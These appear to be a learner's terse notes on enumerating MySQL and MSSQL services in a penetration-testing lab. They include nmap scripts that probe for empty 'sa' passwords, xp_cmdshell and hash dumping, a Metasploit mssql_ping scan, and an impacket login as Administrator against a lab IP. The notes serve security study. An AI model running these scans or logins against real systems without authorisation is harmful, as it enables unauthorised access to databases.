Serves as central instance where content required by PHP scripts stored
Headers, texts, meta tags, forms, customers, usernames admins, mods
Translates cmds internally into exec code/performs actions
Web app informs the user if an error occurs, which various SQLi can provoke
Error info confirms a web app interacts with a db in a way other than intended
Info can be data extracts from a table/records needed for processing, functions, etc.
Cmds can display, mod, add, delete rows
Can also change table structure, create, delete relationships, indexes, manage users
MariaDB: Often connected with MySQL, is a fork of original code
sudo apt install mysql-server -y # install mysql server
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d' # configs
Dangerous Settings
user # sets which user mysql will run as
password # sets password
admin_address # IP to listen for connections on admin network int
debug # debugging settings
sql_warnings # controls if single-row INSERT statements produce info str on warnings
secure_file_priv # used to limit effect of data import/export ops
user, password, admin_address plain text
debug, sql_warnings provide info, which could further attack surface
information schema metadata mainly retrieved from system schema db
ANSI/ISO standard is the reason both exist
System schema MS catalog for SQL servers
mysql -u user -ppassword -h IP # connect to mysql server | no space bet -p and pass
show databases;
use database; # select a database
show tables;
show columns from tablee; # show all columns in selected database
select * from table; # show everything in table
select * from table where column = "string"; # search for string in desired table
MSSQL
MS's SQL-based relational db mgmt system:
Closed source/initially written to run on Win MSSQL Clients
SMMS: SQL Server Management Studio: Feature that can be installed with MSSQL
We could come across a vuln sys with SSMS with saved creds that allow access
master # tracks all sys info for a SQL server instance
model # template: structure for every new db: any changes flected in new db's
msdb # sql server agent uses this db to schedule jobs & alerts
tempdb # temp objects
resource # read-only db: system objects included with sql server
Many clients can be used to access a db running MSSQL:
locate mssqlclient # find if/where client is on host
/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py
When an admin installs/configs MSSQL to be network accessible, service runs as:
NT SERVICE\MSSQLSERVER:Connecting from client-side possible through Win Auth
Default: Encryption not enforced
Win will process login request/use local SAM db/AD DC before allowing connectivity to dbms
Using AD can be ideal for auditing activity/controlling access
If an acct is compromised, it could lead to privesc/lateral movement
# dangerous settings
-- clients not using encryption to connect
-- self-signed certs when encryption is used (spoofing)
-- use of named pipes
-- weak/default sa creds
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
| ms-sql-ntlm-info:
| Target_Name: SQL-01
| NetBIOS_Domain_Name: SQL-01
Host script results:
| ms-sql-info:
| Windows server name: SQL-01
| 10.129.201.248\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Named pipe: \\10.129.201.248\pipe\sql\query
aux scanner with metasploit: mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248
msf6 auxiliary(scanner/mssql/mssql_ping) > run
Connecting with Mssqlclient.py
python3 impacket-mssqlclient.py Administrator@10.129.201.248 -windows-auth
SQL> select name from sys.databases
name
-----------------------------------
master
tempdb
model
msdb
Transactions
